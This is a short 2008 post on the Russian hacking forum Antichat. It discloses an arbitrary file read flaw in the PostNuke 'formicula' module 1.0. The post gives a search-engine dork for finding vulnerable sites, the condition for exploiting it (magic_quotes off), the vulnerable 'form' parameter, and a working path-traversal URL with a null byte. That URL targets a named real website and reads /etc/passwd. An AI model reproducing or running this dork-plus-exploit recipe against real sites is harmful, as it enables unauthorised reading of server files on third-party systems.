Показать сообщение отдельно

  #9  
Старый 21.12.2008, 19:04
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

PostNuke. Модуль: formicula Чтение произвольных файлов

Уязвимый продукт: Модуль: formicula
Версия: 1.0
Дорк: "inurl:module=formicula"
Условие: "magic_quotes-off"

Ещё одна читалка, и опять не нашёл где скачать код, хотя по дорку модуль вроде достаточно популярен

Уязвимый параметр form

Пример уязвимости:
http://www.seacom-dtms.de/index.php?module=formicula&func=main&form=/../../../../../../../etc/passwd%00
 
Ответить с цитированием